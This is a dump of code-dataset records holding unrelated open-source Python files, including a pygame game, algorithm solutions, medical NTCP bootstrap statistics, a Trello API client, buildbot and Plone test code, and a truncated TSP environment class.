Animation(\"images\\\\dragon.png\",11,game,768/3,1024/4,4)\n\ngame.setMusic(\"sounds\\\\avalanche.mp3\")\ndragonSound = Sound(\"sounds\\\\dragonBreathe.wav\",1)\nfireSound = Sound(\"sounds\\\\fireball.wav\",2)\njumpingSound = Sound(\"sounds\\\\jumping.wav\",3)\nlanding = Sound(\"sounds\\\\landing.wav\",4)\nwalking = Sound(\"sounds\\\\walking.wav\",5)\nsplash = Sound(\"sounds\\\\splash.wav\",6)\n\n#Play Intro\nintro()\n\n#Position objects\nplatforms[0].moveTo(game.width/2,randint(250,300))\nfor index in range(1,size):\n platforms[index].moveTo(platforms[index-1].x + platforms[index-1].width + 100,randint(250,350))\n\nhero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height)\n\nworld = [hero]\nworld.extend(platforms)\n\nplay = True\nwhile play:\n #Play Game\n levelOne()\n play = gameover()\n platforms[0].moveTo(game.width/2,randint(250,300))\n for index in range(1,size):\n platforms[index].moveTo(platforms[index-1].x + platforms[index-1].width + 100,randint(250,350))\n\n hero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height)\n\n world = [hero]\n world.extend(platforms)\n game.score = 0\n last = size -1\n\ngame.quit()\n\n\n\n\n","repo_name":"rcastro2/pygameAbstract","sub_path":"LavaJumper/LavaJumper.py","file_name":"LavaJumper.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"16814093682","text":"from typing import List\n\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n print(height)\n\n if height is None or len(height) == 0:\n return 0\n\n totalTrapped = 0\n leftHigh = [0] * len(height)\n rightHigh = [0] * len(height)\n leftHigh[0] = height[0]\n rightHigh[-1] = height[-1]\n\n for i in range(1, len(height)):\n leftHigh[i] = max(leftHigh[i-1], height[i])\n\n for i in range(len(height)-2, -1, -1):\n rightHigh[i] = max(rightHigh[i+1], height[i])\n\n for i in range(len(height)):\n totalTrapped += min(leftHigh[i], rightHigh[i]) - height[i]\n\n return totalTrapped\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.trap([0,1,0,2,1,0,1,3,2,1,2,1]))\n","repo_name":"vishwakt/A-Problem-A-Day","sub_path":"42_trapping_rain_water.py","file_name":"42_trapping_rain_water.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17562459842","text":"import random\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import *\r\nfrom tkinter import *\r\nfrom ..Patients import *\r\n\r\n\r\ndef calculateLKBuncert(self):\r\n \"\"\"Based on http://stacks.iop.org/1742-6596/489/i=1/a=012087?key=crossref.181b59106e0d253de74e704220e16c36.\r\n\r\n Choose between profile likelihood method, parametric and non-parametric bootstrapping (time demanding!!!!!)\r\n Profile likelihood method: Vary each parameter individually until the LLH is decreased by an amount equal to half the\r\n the critical value of chi2(1) distribution at the desired significance level\r\n Critical value: http://www3.med.unipmn.it/~magnani/pdf/Tavole_chi-quadrato.pdf. 1.92?\r\n\r\n Non-parametric: Randomly choose patients, with replacement, from sample 1000-2000 times and calculate n,m,TD50 from sample\r\n The confidence interval is chosen from the distribution of n,m,TD50 values\r\n Assumptions: The cohort covers the different parameters, a robust method.\r\n My assumption: We choose the same number of patients.\r\n\r\n Parametric bootstrapping: A synthesised population is derived from the found n,m,TD50\r\n For each patient, calculate the NTCP using the optimized n,m,TD50 values.\r\n Generate a random number rn [0,1] for each patient; rn < NTCP -> tox, rn > NTCP -> no tox\r\n Find n,m,TD50 from the synthesized population using these values, repeat 1000-2000 times\r\n Assumption: The cohort describes the real population. \"\"\"\r\n\r\n # REDO THIS\r\n\r\n self.window.destroy() # Destroy bootstrap dialog window\r\n\r\n cohortList = list(self.patients.values())\r\n cohortNames = \", \".join(list(self.patients.keys()))\r\n nIterations = self.options.confidenceIntervalIterations.get()\r\n\r\n for patients in cohortList:\r\n patients.options = self.options\r\n patients.pSpace = patients.ParameterSpace(nIterations, self.options.NTCPcalculation.get(), self.log, patients.cohort)\r\n\r\n if self.options.NTCPcalculation.get() == \"Logit\":\r\n patients.calculateDpercent(self.options.NTCPcalculationDpercent.get())\r\n if np.sum(patients.bestParameters):\r\n patients.pSpace.setParameters({'a': patients.bestParameters[0], 'b': patients.bestParameters[1]})\r\n\r\n else:\r\n if np.sum(patients.bestParameters):\r\n patients.pSpace.setParameters({'n': patients.bestParameters[0], 'm': patients.bestParameters[1], 'TD50': patients.bestParameters[2]})\r\n\r\n if self.options.optimizationScheme.get() == \"GradientDescent\":\r\n res = patients.doGradientOptimization(self.progress)\r\n\r\n elif self.options.optimizationScheme.get() == \"MatrixMinimization\":\r\n res = patients.doMatrixMinimization(self.progress)\r\n\r\n patients.calculateNTCP()\r\n patients.bestParameters = res.x\r\n\r\n origIt = self.options.basinHoppingIterations.get()\r\n self.options.basinHoppingIterations.set(2)\r\n self.progress['maximum'] = nIterations * len(cohortList)\r\n\r\n grade = self.options.toxLimit.get()\r\n\r\n # Loop over cohorts early\r\n for cohort, patients in self.patients.items():\r\n print(f\"Looping over cohort {cohort} of {cohortNames}\")\r\n time1 = time.time()\r\n\r\n if self.options.confidenceIntervalMethod.get() == \"ParametricBootstrapping\":\r\n patients.saveTox()\r\n\r\n for k in range(nIterations):\r\n self.progress.step(1)\r\n self.progress.update_idletasks()\r\n\r\n for patient in patients.patients.values():\r\n rn = random.random()\r\n ntcp = patient.getNTCP()\r\n patient.setTox(rn < ntcp and grade or 0)\r\n\r\n if self.options.optimizationScheme.get() == \"GradientDescent\":\r\n res = patients.doGradientOptimization(None)\r\n elif self.options.optimizationScheme.get() == \"MatrixMinimization\":\r\n res = patients.doMatrixMinimization(None)\r\n\r\n if res.fun < -self.options.confidenceIntervalLikelihoodLimit.get():\r\n continue\r\n\r\n patients.pSpace.addPoint(*res.x)\r\n patients.pSpace.addPointLLH(-res.fun)\r\n\r\n patients.restoreTox()\r\n\r\n elif self.options.confidenceIntervalMethod.get() == \"NonParametricBootstrapping\":\r\n patientZip = list()\r\n for patientName in patients.patients.keys():\r\n patientZip.append((cohort, patientName))\r\n nPatients = len(patientZip)\r\n\r\n for k in range(nIterations):\r\n print(\".\", end=\"\")\r\n self.progress.step(1)\r\n self.progress.update_idletasks()\r\n\r\n newPatientCohort = Patients(self.options)\r\n newPatientCohort.bestParameters = list(patients.bestParameters)\r\n\r\n nTox = 0\r\n for n in range(nPatients):\r\n thisPatient = Patient(None)\r\n randomPatientID = random.randint(0, nPatients - 1)\r\n\r\n thisCohort = patientZip[randomPatientID][0]\r\n thisName = patientZip[randomPatientID][1]\r\n thisPatient.setTox(self.patients[thisCohort].patients[thisName].getTox())\r\n nTox += thisPatient.getTox() >= self.options.toxLimit.get()\r\n if self.options.NTCPcalculation.get() == \"LKB\":\r\n thisPatient.nList = self.patients[thisCohort].patients[thisName].nList\r\n thisPatient.GEUDlist = self.patients[thisCohort].patients[thisName].GEUDlist\r\n else:\r\n thisPatient.Dpercent = self.patients[thisCohort].patients[thisName].Dpercent\r\n thisPatient.setID(thisName)\r\n while thisName in newPatientCohort.patients:\r\n thisName += \"_\"\r\n newPatientCohort.patients[thisName] = thisPatient\r\n\r\n if nTox == 0:\r\n continue\r\n\r\n if self.options.optimizationScheme.get() == \"GradientDescent\":\r\n res = newPatientCohort.doGradientOptimization(None)\r\n elif self.options.optimizationScheme.get() == \"MatrixMinimization\":\r\n res = newPatientCohort.doMatrixMinimization(None)\r\n\r\n del newPatientCohort\r\n\r\n if res.fun < -self.options.confidenceIntervalLikelihoodLimit.get():\r\n continue\r\n\r\n patients.pSpace.addPoint(*res.x)\r\n patients.pSpace.addPointLLH(-res.fun)\r\n\r\n elif self.options.confidenceIntervalMethod.get() == \"ProfileLikelihood\":\r\n res = patients.profileLikelihood()\r\n if self.options.NTCPcalculation.get() == \"Logit\":\r\n patients.pSpace.CI[\"a\"] = res[0]\r\n patients.pSpace.CI[\"b\"] = res[1]\r\n else:\r\n patients.pSpace.CI[\"n\"] = res[0]\r\n patients.pSpace.CI[\"m\"] = res[1]\r\n patients.pSpace.CI[\"TD50\"] = res[2]\r\n\r\n patients.pSpace.printCI()\r\n\r\n patients.confidenceInterval = res\r\n return\r\n\r\n print(\"Done\\n\\n\")\r\n\r\n time2 = time.time()\r\n self.options.basinHoppingIterations.set(origIt)\r\n\r\n ###################################################################\r\n # Finished performing the bootstrap, analyse the results ... :) #\r\n ###################################################################\r\n\r\n patients.pSpace.trim()\r\n\r\n patients.pSpace.setPercentile(self.options.confidenceIntervalPercent.get())\r\n patients.pSpace.setBootstrapCorrectionMethod(self.options.bootstrapCorrectionMethod.get())\r\n patients.pSpace.calculateCI()\r\n patients.pSpace.applyPivot()\r\n patients.pSpace.writeToFile()\r\n\r\n self.log(f\"\\nFinished Confidence Interval tests for cohort {cohort} ({(time2-time1)/60:.1f} minutes).\")\r\n self.log(f\"{self.options.confidenceIntervalPercent.get()}% CI calculated as \"\r\n f\"the percentiles of a {self.options.confidenceIntervalMethod.get()} procedure.\")\r\n\r\n patients.pSpace.printResults(self.log)\r\n patients.bestParameters = patients.pSpace.getParameters()\r\n patients.pSpace.plotResults()\r\n\r\n plt.show()\r\n","repo_name":"lc52520/DVHToolkit","sub_path":"modules/MainMenu/_NTCPbootstrap.py","file_name":"_NTCPbootstrap.py","file_ext":"py","file_size_in_byte":8366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"28605646898","text":"import pandas as pd\n\n\ndef primeira_planilha():\n\n dados = dict()\n # Abra a planilha e leia os dados\n df_planilha = pd.read_excel('planilhas/PLANILHA CORREIOS ATUALIZADO 17 04 23 A 16 05 23.xlsx')\n\n valores_coluna_5 = df_planilha.iloc[:, 5].fillna('-').tolist()[1:]\n valores_coluna_7 = df_planilha.iloc[:, 7].fillna('-').tolist()[1:]\n\n # Imprima os valores da coluna\n for valor5, valor7 in zip(valores_coluna_5[1:], valores_coluna_7[1:]):\n print(valor5, valor7)\n dados[valor5] = valor7\n \n return dados\n\n\ndef segunda_planilha():\n dados = dict()\n # Abra a planilha e leia os dados\n df_csv = pd.read_csv('planilhas/correiostec.csv', sep=';')\n num_colunas = df_csv.shape\n print(\"TEC Número de colunas:\", num_colunas)\n\n valores_coluna_1 = df_csv.iloc[:, 1].fillna('-').tolist()[0:]\n valores_coluna_2 = df_csv.iloc[:, 2].fillna('-').tolist()[0:]\n\n for valor1, valor2 in zip(valores_coluna_1, valores_coluna_2):\n print(valor1, valor2)\n dados[valor1] = valor2\n \n return dados\n\n\ndef terceira_planilha():\n dados = dict()\n # Abra a planilha e leia os dados\n df_csv = pd.read_csv('planilhas/correiosdistri.csv', sep=';')\n num_colunas = df_csv.shape\n print(\"DISTRI Número de colunas:\", num_colunas)\n\n valores_coluna_1 = df_csv.iloc[:, 1].fillna('-').tolist()[0:]\n valores_coluna_2 = df_csv.iloc[:, 2].fillna('-').tolist()[0:]\n\n for valor1, valor2 in zip(valores_coluna_1, valores_coluna_2):\n print(valor1, valor2)\n dados[valor1] = valor2\n \n return dados\n\n\ndef comparar_dicionarios(dic1, dic2):\n for chave in dic1:\n if chave in dic2:\n if dic1[chave] > 0:\n print(\"Nota Fiscal:\", chave)\n print(\"Valor na planilha um:\", dic1[chave])\n print(\"Valor no planilha dois:\", dic2[chave])\n print() \n\n\nif __name__ == '__main__':\n planilha_um = primeira_planilha()\n planilha_dois = segunda_planilha()\n planilha_tres = terceira_planilha()\n\n comparar_dicionarios(planilha_um, planilha_dois)\n comparar_dicionarios(planilha_um, planilha_tres)","repo_name":"cesnascimento/FreteB2B","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24586843297","text":"#Arquivo para armazenamento, alteração ou remoção de dados dos arquivos persistentes\n\n#importar arquivos da models\nfrom models import *\n\nclass DaoCategoria:\n \n @classmethod\n def salvar(cls, categoria):\n with open('Categoria.txt', 'a') as arq:\n arq.writelines(categoria)\n arq.writelines('\\n')\n \n @classmethod\n def ler(cls):\n with open('Categoria.txt', 'r') as arq:\n cls.categoria = arq.readlines()\n \n #Para tirar o \\n basta relaizar uma funcao replace, através de cade item da lista, alterando para uma string vazia\n cls.categoria = list(map(lambda x: x.replace('\\n',''), cls.categoria))\n \n listaCat = []\n for i in cls.categoria:\n listaCat.append(Categoria(i))\n \n #Retorna uma lista de instancias de objetos\n return listaCat\n\nclass DaoVendas:\n \n @classmethod\n def salvar(cls, venda: Venda):\n with open('Vendas.txt', 'a') as arq:\n arq.writelines(venda.itensVendido.nome+'|'+str(venda.itensVendido.valor)+'|'\n +venda.itensVendido.categoria+'|'+venda.vendedor+'|'\n +venda.comprador+'|'+str(venda.quantidadeVendida)+'|'\n +venda.data)\n arq.writelines('\\n')\n\n @classmethod\n def ler(cls):\n with open('Vendas.txt', 'r') as arq:\n cls.venda = arq.readlines()\n\n cls.venda = list(map(lambda x: x.replace('\\n',''), cls.venda))\n cls.venda = list(map(lambda x: x.split('|'), cls.venda))\n\n listaVend = []\n for i in cls.venda:\n listaVend.append(Venda(Produtos(i[0], i[1], i[2]), i[3], i[4], i[5], i[6]))\n \n #Retorna uma lista de instancias de objetos\n return listaVend\n\nclass DaoEstoque:\n\n @classmethod\n def salvar(cls, produto: Produtos, quantidade):\n with open('Estoque.txt', 'a') as arq:\n arq.writelines(produto.nome+'|'+str(produto.valor)+'|'\n +produto.categoria+'|'+str(quantidade))\n arq.writelines('\\n')\n \n @classmethod\n def ler(cls):\n with open('Estoque.txt', 'r') as arq:\n cls.estoque = arq.readlines()\n \n cls.estoque = list(map(lambda x: x.replace('\\n',''), cls.estoque))\n cls.estoque = list(map(lambda x: x.split('|'), cls.estoque))\n \n listaEst = []\n for i in cls.estoque:\n listaEst.append(Estoque(Produtos(i[0], i[1], i[2]), int(i[3])))\n \n #Retorna uma lista de instancias de objetos\n return listaEst\n\nclass DaoFornecedor:\n\n @classmethod\n def salvar(cls, fornecedor: Fornecedor):\n with open('Fornecedor.txt', 'a') as arq:\n arq.writelines(fornecedor.nome+'|'+fornecedor.cnpj+'|'\n +fornecedor.telefone+'|'+fornecedor.categoria+'|')\n arq.writelines('\\n')\n\n @classmethod\n def ler(cls):\n with open('Fornecedor.txt', 'r') as arq:\n cls.fornecedor = arq.readlines()\n\n cls.fornecedor = list(map(lambda x: x.replace('\\n',''), cls.fornecedor))\n cls.fornecedor = list(map(lambda x: x.split('|'), cls.fornecedor))\n \n listaFor = []\n for i in cls.fornecedor:\n listaFor.append(Fornecedor(i[0], i[1], i[2], i[3]))\n\n return listaFor\n\nclass DaoCliente:\n\n @classmethod\n def salvar(cls, cliente: Cliente):\n with open('Cliente.txt', 'a') as arq:\n arq.writelines(cliente.nome+'|'+cliente.telefone+'|'\n +cliente.cpf+'|'+cliente.email+'|'\n +cliente.endereco)\n arq.writelines('\\n')\n\n @classmethod\n def ler(cls):\n with open('Cliente.txt', 'r') as arq:\n cls.cliente = arq.readlines()\n\n cls.cliente = list(map(lambda x: x.replace('\\n',''), cls.cliente))\n cls.cliente = list(map(lambda x: x.split('|'), cls.cliente))\n\n listaCli = []\n for i in cls.cliente:\n listaCli.append(Cliente(i[0], i[1], i[2], i[3], i[4]))\n\n return listaCli\n\nclass DaoFuncionario:\n\n @classmethod\n def salvar(cls, funcionario: Funcionario):\n with open('Funcionario.txt', 'a') as arq:\n arq.writelines(funcionario.clt+'|'+funcionario.nome+'|'\n +funcionario.telefone+'|'+funcionario.cpf+'|'\n +funcionario.email+'|'+funcionario.endereco)\n arq.writelines('\\n')\n \n @classmethod\n def ler(cls):\n with open('Funcionario.txt', 'r') as arq:\n cls.funcionario = arq.readlines()\n\n cls.funcionario = list(map(lambda x: x.replace('\\n', ''), cls.funcionario))\n cls.funcionario = list(map(lambda x: x.split('|'), cls.funcionario))\n\n listaFunc = []\n for i in cls.funcionario:\n listaFunc.append(Funcionario(i[0], i[1], i[2], i[3], i[4], i[5]))\n\n return listaFunc\n","repo_name":"FernandohsSantos1/MVC_Mercearia","sub_path":"DAO.py","file_name":"DAO.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30986530930","text":"\"\"\"\n$Id:\n\"\"\"\n# Test weblog with LP >= 0.9\n\nfrom Products.LinguaPlone.tests.utils import makeContent\nfrom Products.LinguaPlone.tests.utils import makeTranslation\n\nfrom Products.Quills.tests import QuillsLinguaPloneTestCase\nimport transaction\n\nclass TestWeblogTranslation(\n QuillsLinguaPloneTestCase.QuillsLinguaPloneTestCase):\n\n def _setup(self):\n QuillsLinguaPloneTestCase.QuillsLinguaPloneTestCase._setup(self)\n\n def afterSetUp(self):\n self.login()\n self.setRoles([\"Manager\"])\n self.addLanguage('de')\n self.setLanguage('en')\n self.weblog_en = makeContent(self.folder, 'Weblog', 'weblog')\n self.weblog_en.setLanguage('en')\n\n def testTranslationKeepSameIdInDifferentFolders(self):\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n englishpost = makeContent(self.weblog_en, 'WeblogEntry', 'post')\n englishpost.setLanguage('en')\n germanpost = makeTranslation(englishpost, 'de')\n self.assertEqual(englishpost.getId(), germanpost.getId())\n\n def testTranslationIsMovedToTranslatedFolder(self):\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n englishpost = makeContent(self.weblog_en, 'WeblogEntry', 'post')\n englishpost.setLanguage('en')\n germanpost = makeTranslation(englishpost, 'de')\n self.failUnless(englishpost in self.weblog_en.objectValues())\n self.failUnless(germanpost in self.weblog_de.objectValues())\n\n def testFolderTranslationMoveTranslatedContent(self):\n english1 = makeContent(self.weblog_en, 'WeblogEntry', 'entry1')\n english1.setLanguage('en')\n english2 = makeContent(self.weblog_en, 'WeblogEntry', 'entry2')\n english2.setLanguage('en')\n german1 = makeTranslation(english1, 'de')\n german2 = makeTranslation(english2, 'de')\n transaction.savepoint(optimistic=True)\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n self.failUnless(english1.getId() in self.weblog_en.objectIds())\n self.failUnless(english2.getId() in self.weblog_en.objectIds())\n self.failIf(english1.getId() in self.weblog_de.objectIds())\n self.failIf(english2.getId() in self.weblog_de.objectIds())\n self.failUnless(german1.getId() in self.weblog_de.objectIds())\n self.failUnless(german2.getId() in self.weblog_de.objectIds())\n self.failIf(german1.getId() in self.weblog_en.objectIds())\n self.failIf(german2.getId() in self.weblog_en.objectIds())\n\n def testSetLanguageMoveTranslatedContent(self):\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n en2de = makeContent(self.weblog_en, 'WeblogEntry', 'entry2')\n en2de.setLanguage('en')\n transaction.savepoint(optimistic=True)\n en2de.setLanguage('de')\n self.failIf(en2de.getId() in self.weblog_en.objectIds())\n self.failUnless(en2de.getId() in self.weblog_de.objectIds())\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n from Products.LinguaPlone.tests import LinguaPloneTestCase\n LinguaPloneTestCase # PYFLAKES\n suite.addTest(makeSuite(TestWeblogTranslation))\n return suite\n","repo_name":"collective/Products.Quills","sub_path":"Products/Quills/tests/test_weblogLinguaPlone.py","file_name":"test_weblogLinguaPlone.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73185619364","text":"import unittest\nimport diplomaticpulse.parsers.beautifulsoup_parser as util\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# following is just to ignore https certificate issues\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nclass TestHtmlUtils(unittest.TestCase):\n \"\"\"\n Class containing the test suite for get_text_from_html_block(().\n\n Tests are programmed as prescribed the pythons unittest's package.\n\n \"\"\"\n\n def setUp(self):\n options = Options()\n options.add_argument(\"--headless\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-gpu\") # Last I checked this was necessary.\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def test_get_text_from_html_block1(self):\n \"\"\"\n We pass url, xpaths, driver to get_text_from_html_block( and expect text\n \"\"\"\n url = \"http://localhost/scrapy.html\"\n xpaths = {\"global\": \"div,container\", \"link\": \"html.a\", \"posted_date\": \"li.a\"}\n\n result = util.get_text_from_html_block(url, xpaths, self.driver)\n expected = [{'url': 'https://scrapy.org/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/scrapy-cloud/', 'title': None, 'posted_date': None},\n {'url': 'https://github.com/scrapy/scrapy', 'title': None, 'posted_date': None}]\n self.assertEqual(expected, result)\n\n def test_get_text_from_html_block2(self):\n \"\"\"\n We pass url, xpaths, driver to get_info_from_html_block and expect text\n \"\"\"\n url = \"http://localhost/scrapy.html\"\n xpaths = {\n \"global\": \"div,container\",\n \"link\": \"html.a\",\n \"title\": \"li\",\n \"posted_date\": \"li.a\",\n }\n result = util.get_text_from_html_block(url, xpaths, self.driver)\n expected = [{'url': 'https://scrapy.org/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/scrapy-cloud/', 'title': None, 'posted_date': None},\n {'url': 'https://github.com/scrapy/scrapy', 'title': None, 'posted_date': None}]\n self.assertEqual(expected, result)\n","repo_name":"qcri/DiplomaticPulse","sub_path":"diplomaticpulse/tests/test_get_text_from_html_block.py","file_name":"test_get_text_from_html_block.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11787597425","text":"# Toboggan Trajectory\n\ndef read_from_file(file_name):\n _file = open(file_name, 'r')\n _read = _file.read().split(\"\\n\")\n _file.close()\n return _read\n\npuzzle_input = read_from_file(\"inputs/day03.txt\")\n\ndef solve1(dx=3, dy=1):\n width = len(puzzle_input[0])\n\n num_trees = 0\n y = 0\n x = 0\n while True:\n\n x += dx\n y += dy\n if y >= len(puzzle_input):\n break\n if puzzle_input[y][x % width] == \"#\":\n num_trees+=1\n return num_trees\n\ndef solve2():\n i = 1\n for k in [[1, 1], [3, 1], [5, 1], [7, 1], [1, 2]]:\n i *= solve1(k[0], k[1])\n return i\n \nprint(\"Pt1:\", solve1())\nprint(\"Pt2:\", solve2())\n","repo_name":"Germax26/Advent-of-Code","sub_path":"2020/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71333500326","text":"import curses\nimport os\n\nimport pygit2\n\nfrom gitcurses.colors import Colors\n\n\nclass Application:\n\n def __init__(self):\n screen = curses.initscr()\n maxy, maxx = screen.getmaxyx()\n self.max_y = maxy\n self.max_x = maxx\n self.screen = screen\n\n def __enter__(self):\n curses.noecho()\n curses.cbreak()\n self.screen.keypad(True)\n curses.start_color()\n curses.curs_set(0)\n return self\n\n def __exit__(self, *args):\n curses.echo()\n curses.nocbreak()\n self.screen.keypad(False)\n\n def run(self):\n quit = False\n\n repo = pygit2.Repository(os.getcwd())\n branch_name = repo.head.shorthand\n remotes = repo.remotes\n self.screen.attron(Colors.get_pair(curses.COLOR_WHITE, curses.COLOR_MAGENTA))\n self.screen.hline(0, 0, ' ', self.max_x)\n self.screen.addstr(0, 1, \"GitCurses v0.1\")\n self.screen.addstr(2, 1, f\"Head: {branch_name}\", Colors.get_pair(curses.COLOR_WHITE))\n if remotes:\n self.screen.addstr(3, 1, f\"Upstream: {remotes}\", Colors.get_pair(curses.COLOR_CYAN))\n\n while not quit:\n next_input = self.screen.getkey()\n self.screen.addstr(2, 1, next_input, Colors.get_pair(curses.COLOR_GREEN, curses.COLOR_BLUE))\n self.screen.addstr(3, 1, next_input, Colors.get_pair(curses.COLOR_CYAN))\n self.screen.attron(Colors.get_pair(curses.COLOR_BLUE))\n self.screen.hline(5, 0, '-', self.max_x)\n if 'q' in next_input:\n quit = True\n\n","repo_name":"areading314/gitcurses","sub_path":"gitcurses/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32312781543","text":"from typing import List\n\nimport requests\nimport logging\n\nlogger = logging.getLogger(__file__)\n\nBASE_ENTRY_POINT = 'https://api.trello.com/1'\n\n\nclass TrelloApiClient:\n def __init__(self, key, token):\n self._key = key\n self._token = token\n\n def _RequestApi(self, url, method, data={}):\n data['key'] = self._key\n data['token'] = self._token\n\n resp = 0\n if method == 'GET':\n resp = requests.get(url, data=data)\n elif method == 'POST':\n resp = requests.post(url, data=data)\n elif method == 'PUT':\n resp = requests.put(url, data=data)\n else:\n resp = 0\n\n return resp\n\n def _add_card(self, card_title: str, list_id: str):\n url = '%s/%s' % (BASE_ENTRY_POINT, 'cards')\n data = {\n 'idList': list_id,\n 'name': card_title\n }\n resp = self._RequestApi(url, 'POST', data=data)\n logger.info(resp.status_code)\n if resp.status_code == 200:\n card_title = resp.json()['name']\n logger.info('create card: %s' % card_title)\n return card_title\n else:\n logger.warning('')\n return None\n\n def add_cards(self, card_titles, list_id):\n added_cards = []\n logger.info(card_titles)\n for title in card_titles:\n added_cards.append(self._add_card(title, list_id))\n logger.info(added_cards)\n return list(filter(lambda x: x, added_cards))\n\n def get_cards_on_list(self, list_id: str):\n url = '%s/%s/%s/%s' % (BASE_ENTRY_POINT, 'list', list_id, 'cards')\n data = {\n 'idList': list_id\n }\n resp = self._RequestApi(url, 'GET', data=data)\n logger.info(resp.status_code)\n if resp.status_code == 200:\n return [{'id': card['id'], 'name': card['name']} for card in resp.json()]\n else:\n return []\n\n def _close_card_by_id(self, card_id: str):\n url = '%s/%s/%s' % (BASE_ENTRY_POINT, 'cards', card_id)\n data = {\n 'closed': 'true'\n }\n resp = self._RequestApi(url, 'PUT', data)\n logger.info(resp.status_code)\n if resp.status_code == 200:\n return resp.json()['name']\n else:\n return None\n\n def close_cards_by_titles(self, card_titles: List[str], list_id: str):\n cards = self.get_cards_on_list(list_id)\n closed_cards = []\n for title in card_titles:\n for card in cards:\n if card['name'] == title:\n closed_cards.append(self._close_card_by_id(card['id']))\n return list(set(list(filter(lambda x: x, closed_cards))))\n","repo_name":"mpozpnd/ActionsOnTrello","sub_path":"src/g2trello/trello.py","file_name":"trello.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13055776406","text":"from buildbot import config\nfrom buildbot import interfaces\nfrom buildbot import util\nfrom buildbot.process import metrics\nfrom twisted.application import service\nfrom twisted.internet import defer\nfrom twisted.python import log\nfrom zope.interface import implements\n\n\nclass ChangeManager(config.ReconfigurableServiceMixin, service.MultiService):\n\n \"\"\"\n This is the master-side service which receives file change notifications\n from version-control systems.\n\n It is a Twisted service, which has instances of\n L{buildbot.interfaces.IChangeSource} as child services. These are added by\n the master with C{addSource}.\n \"\"\"\n\n implements(interfaces.IEventSource)\n\n name = \"changemanager\"\n\n def __init__(self, master):\n service.MultiService.__init__(self)\n self.setName('change_manager')\n self.master = master\n\n @defer.inlineCallbacks\n def reconfigService(self, new_config):\n timer = metrics.Timer(\"ChangeManager.reconfigService\")\n timer.start()\n\n removed, added = util.diffSets(\n set(self),\n new_config.change_sources)\n\n if removed or added:\n log.msg(\"adding %d new changesources, removing %d\" %\n (len(added), len(removed)))\n\n for src in removed:\n yield defer.maybeDeferred(\n src.disownServiceParent)\n src.master = None\n\n for src in added:\n src.master = self.master\n src.setServiceParent(self)\n\n num_sources = len(list(self))\n assert num_sources == len(new_config.change_sources)\n metrics.MetricCountEvent.log(\"num_sources\", num_sources, absolute=True)\n\n # reconfig any newly-added change sources, as well as existing\n yield config.ReconfigurableServiceMixin.reconfigService(self,\n new_config)\n\n timer.stop()\n","repo_name":"jollyroger/debian-buildbot","sub_path":"buildbot/changes/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"7465856968","text":"\"\"\" \nAuthor of this code: W. Vrielink\n\nFurther documentation:\nhttps://github.com/WouterVrielink/FWAPPA\n\"\"\"\n\nimport math\nimport numpy as np\n# from point import Point\nfrom solver import strip, random_solver, greedy\nfrom route import Route\nfrom distance import select_closest, euclidean_distance, route_distance\n\n\n\nclass Environment(object):\n \"\"\"\n The Environment class interfaces with the Point class in such a way that the\n algorithm class does not have to know anything about the benchmark function\n or its properties.\n \"\"\"\n\n def __init__(self, problem, m):\n \"\"\"\n args:\n bounds: the boundaries of the bench\n bench: the benchmark function object\n \"\"\"\n self.problem = problem\n self.m = m\n\n # Prepare data lists for statistics\n self.evaluation_statistics = []\n self.evaluation_statistics_best = []\n self.generation_statistics = []\n\n self.generation_number = 0\n self.evaluation_number = 0\n self.cur_best = math.inf\n self.cur_best_route = None\n\n def get_random_population(self):\n \"\"\"\n Randomly initializes a population of size N.\n\n args:\n N (int): the number of individuals to create\n\n returns:\n A list of Point objects.\n \"\"\"\n print(\"-------- CREATING START POPULATION --------\")\n # return [strip(self.problem, self)] + [random_solver(self.problem, self) for _ in range(rand)] + [greedy(self.problem, self) for _ in range(greed)]\n return [random_solver(self.problem, self) for _ in range(self.m)]\n\n\n def calculate_fitness(self, route_df):\n 